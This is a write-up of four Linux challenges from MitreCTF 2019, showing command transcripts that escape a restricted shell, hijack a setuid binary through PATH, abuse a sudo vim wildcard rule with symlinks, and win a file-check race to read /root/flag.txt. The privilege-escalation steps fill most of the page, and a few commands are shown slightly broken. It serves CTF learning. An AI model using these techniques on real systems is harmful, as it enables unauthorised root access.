MitreCTF 2019

Clean Room

Category: Linux

Posted on March 04, 2019

Linux - 50 points

Prompt

The year is 30xx. Clyde is trapped in an interdimensional transport module. The Federation has captured the module and has prepared to dock. The captain of the Federation lander has instructed the henchmen to bring Clyde in to Federation custody. As a precaution they will place Clyde in a clean room to remove any radiation. Luckily, you’ve hacked into the lander’s mainframe. Help Clyde escape!

ssh ctf@138.247.13.108

Solution

So first we ssh'd into the system

ssh ctf@138.247.13.108

Next, we tried to get as much info as we could:

$ echo $SHELL
> /bin/rbash

Ok, cool, so we learned that we were running rbash, a restricted bash shell. We then attempted to see what commands we could run:

$ echo $PATH
> /home/ctf/bin
$ ls /home/ctf/bin
> -rbash: ls: command not found

After finding out we couldn't list anything, we tried to run a few commands:

$ pwd
> -rbash: pwd: command not found
$ env
> -rbash: env: command not found
$ set
> -rbash: set: command not found
$ export
> -rbash: export: command not found
$ vim
> -rbash: vim: command not found
$ mv
> -rbash: mv: command not found
$ /bin/bash
> -rbash: /bin/bash: restricted: cannot specify `/' in command names

Ok, so its pretty evident that we aren't gonna escape rbash by running any basic commands. After reading Michal Knapiewicz's Escape From SHELLcatraz slides we tried the following:

$ ssh ctf@138.247.13.108 -t "bash --noprofile"

After this, we tried to see what shell we were in:

$ echo $SHELL
> /bin/bash

Sweet, lets try to find the flag:

$ find / -name "*flag*"
> /root/flag.txt
$ cat /root/flag.txt
> MCTF{ieHaisoh4eif2ae}

Flag

Flag: MCTF{ieHaisoh4eif2ae}


Getting A Head

Category: Linux

Posted on March 04, 2019

Linux - 100 points

Prompt

Our team has gained limited access to an important system, can you help us escalate our privilege and find the flag?

ssh ctf@138.247.13.107

Solution

First things first, we needed to log in:

ssh ctf@138.247.13.107

After logging in, we want to see what we have access to:

$ ls
> HackMe

Lets find out some info about the file HackMe:

$ file HackMe
> HackMe: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4f64a5f09982a65f171cd95d272d8f749d9dca1c, not stripped

So it is an executable. Before running anything, lets find out some info about it:

$ strings HackMe
> ctf@01831fd849d4:~$ strings HackMe
> /lib64/ld-linux-x86-64.so.2
> libc.so.6
> setuid
> system
> __libc_start_main
> __gmon_start__
> GLIBC_2.2.5
> UH-p    `
> fffff.
> []A\A]A^A_
> head /var/log/auth.log
> ;*3$"
> GCC: (Debian 4.9.2-10+deb8u1) 4.9.2
> GCC: (Debian 4.8.4-1) 4.8.4
> .symtab
> .strtab
> .shstrtab
> .interp
> .note.ABI-tag
> .note.gnu.build-id
> .gnu.hash
> .dynsym
> .dynstr
> .gnu.version
> .gnu.version_r
> .real.dyn
> .real.plt
> .init
> .text
> .fini
> .rodata
> .eh_frame_hdr
> .eh_frame
> .init_array
> .fini_array
> .jcr
> .dynamic
> .got
> .got.plt
> .data
> .bss
> .comment
> crtstuff.c
> __JCR_LIST__
> deregister_tm_clones
> register_tm_clones
> __do_global_dtors_aux
> completed.6670
> __do_global_dtors_aux_fini_array_entry
> frame_dummy
> __frame_dummy_init_array_entry
> HackMe.c
> __FRAME_END__
> __JCR_END__
> __init_array_end
> _DYNAMIC
> __init_array_start
> _GLOBAL_OFFSET_TABLE_
> __libc_csu_fini
> _ITM_deregisterTMCloneTable
> data_start
> _edata
> _fini
> system@@GLIBC_2.2.5
> __libc_start_main@@GLIBC_2.2.5
> __data_start
> __gmon_start__
> __dso_handle
> _IO_stdin_used
> __libc_csu_init
> _end
> _start
> __bss_start
> main
> _Jv_RegisterClasses
> __TMC_END__
> _ITM_registerTMCloneTable
> setuid@@GLIBC_2.2.5
> _init
> ctf@01831fd849d4:~$

Copying the file over and disassembling the binary, it appears that it just runs:

setuid(0)
system('head /var/log/auth.log')

Based on this, lets try to find the flag file, and then move it to /var/log/auth.log:

$ find / -name "*flag*"
> /root/flag.txt

When we attempted to replace auth.log, we were told we do not have access, so we created a quick sed script to edit the strings in the binary:

sed 's@\x68\x65\x61\x64\x20\x2f\x76\x61\x72\x2f\x6c\x6f\x67\x2f\x61\x75\x74\x68\x2e\x6c\x6f\x67@\x68\x65\x61\x64\x20\x2f\x72\x6f\x6f\x74\x2f\x2f\x2f\x2f\x66\x6c\x61\x67\x2e\x74\x78\x74@' HackMe

After attempting this, we realized that modifying the file made us the owner, so setuid(0) no longer changed us to root.

After finding this out, we attempted to replace the head binary.

$ echo $PATH
> /home/ctf/bin:/home/ctf/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
$ ls /home/ctf/bin
>
$ mkdir bin
$ ln -sf /bin/bash bin/head
$ ./HackMe
>  /var/log/auth.log: line 1: Yadayadayada: command not found
$ ln -sf /bin/bash bin/Yadayadayada
$ whoami
> root
$ cat /root/flag.txt
> MCA{ON5cahqu4ooguaw}

And, as we see, it worked.

Flag

Flag: MCA{ON5cahqu4ooguaw}


January 8, 2014

Category: Linux

Posted on March 04, 2019

Linux - 100 points

Prompt

All you need to do is read the flag!

ssh ctf@138.247.13.103

Solution

After enough playing around on the system, I found out that sudo and bash had the following versions:

$ sudo --version
> Sudo version 1.8.14
> Sudoers policy plugin version 1.8.14
> Sudoers file grammar version 44
> Sudoers I/O plugin version 1.8.14

$ bash --version
> Bash:
> GNU bash, version 4.3.48(1)-release (x86_64-pc-linux-gnu)
> Copyright (C) 2013 Free Software Foundation, Inc.
> License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
>
> This is free software; you are free to change and redistribute it.
> There is NO WARRANTY, to the extent permitted by law.

Since Sudo had version 1.8.14, I figured that had something to do with January 8 2014. I looked up vulnerabilities related to this version, and came upon this: https://www.exploit-db.com/exploits/37710

Luckily for us, we can read the sudoers file, which contains the following line:

$ cat /etc/sudoers
> ctf ALL=(root) NOPASSWD: /usr/bin/vim /home/ctf/*/*/HackMe2.txt

So lets find the flag file:

$ find / -name 'flag.txt'
> /root/flag.txt

Great, now its time to symlink to it, and try to edit it:

$ mkdir newdir
$ mkdir newdir/newdir2
$ ln -s /root/flag.txt newdir/newdir2/HackMe2.txt
$ sudo /usr/bin/vim /home/ctf/newdir/newdir2/HackMe2.txt
> MCA{ohghov1ieli7Eo2}

Flag

MCA{ohghov1ieli7Eo2}


Race You

Category: Linux

Posted on March 04, 2019

Linux - 200 points

Prompt

Lets find out who’s faster.

ssh ctf@138.247.13.112

Solution

After ssh'ing into the system, we ran ls to see what files were on the system:

$ ls
> FileChecker FileChecker.c

It looks like we're given the source, so lets read filechecker.c:

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#define UID 1000
#define GID 1000

int main (int argc, char **argv)
{
  FILE *fp;
  struct stat st;
  char content[255];

  stat(argv[1], &st);

  if ( ((st.st_uid ^ UID) & (st.st_gid ^ GID)) == 0) {
    puts("You Win!");

    fp = fopen(argv[1], "r");
    fgets(content, 255, (FILE*)fp);
    fclose(fp);

    printf("%s\n", content);

  } else {
    puts("Access Denied.");
    exit(-1);
  }

  return 0;
}

It looks like there might be a race condition between when it checks the permissions, and when it actually reads the file. But first, lets test it normally:

$ echo "foo" > foo.txt
$ ./FileChecker foo.txt
> You Win!
> foo
>

Ok, now lets try to find the flag:

$ find / -name "flag.txt"
> /root/flag.txt

Time to create a script to repeatedly symlink

$ echo 'bar' > bar.txt
$ echo 'while true; do ln -sf /root/flag.txt foo.txt; rm foo.txt ln -sf bar.txt foo.txt; done' > move.sh
$ chmod +x move.sh
$ ./move.sh &

Now we run the file:

$ while true; do ./FileChecker foo.txt

After running a while, it said I win and gave me the following output:

MCA{ungu0ma9eeHahre}

Flag

MCA{ungu0ma9eeHahre}


Copyright © Cornell Hacking Club 2021